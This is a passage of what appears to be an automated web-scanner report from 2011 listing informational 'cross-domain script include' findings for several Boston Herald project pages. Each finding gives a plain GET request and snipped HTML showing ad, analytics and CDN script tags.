Host:   http://www.bostonherald.com
Path:   /projects/boston_pensions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/boston_pensions/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.700. http://www.bostonherald.com/projects/bra/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/bra/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/bra/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.701. http://www.bostonherald.com/projects/buybacks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/buybacks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/buybacks/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.702. http://www.bostonherald.com/projects/consultants/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/consultants/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/consultants/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 22660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Mass Pike Consultant Datab
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.703. http://www.bostonherald.com/projects/edic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/edic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/edic/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 97885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.704. http://www.bostonherald.com/projects/lawyer_pay/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/lawyer_pay/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/lawyer_pay/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.705. http://www.bostonherald.com/projects/mcas2009

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/mcas2009

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/mcas2009?srvc=slider HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.706. http://www.bostonherald.com/projects/mta2008/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/mta2008/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/mta2008/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.707. http://www.bostonherald.com/projects/non_profit/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/non_profit/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/non_profit/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.708. http://www.bostonherald.com/projects/payroll/brockton/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/brockton/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/payroll/brockton/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
   <!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/brock_payroll.js" type="text/javascript"></script>
...[SNIP]...

18.709. http://www.bostonherald.com/projects/payroll/cambridge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
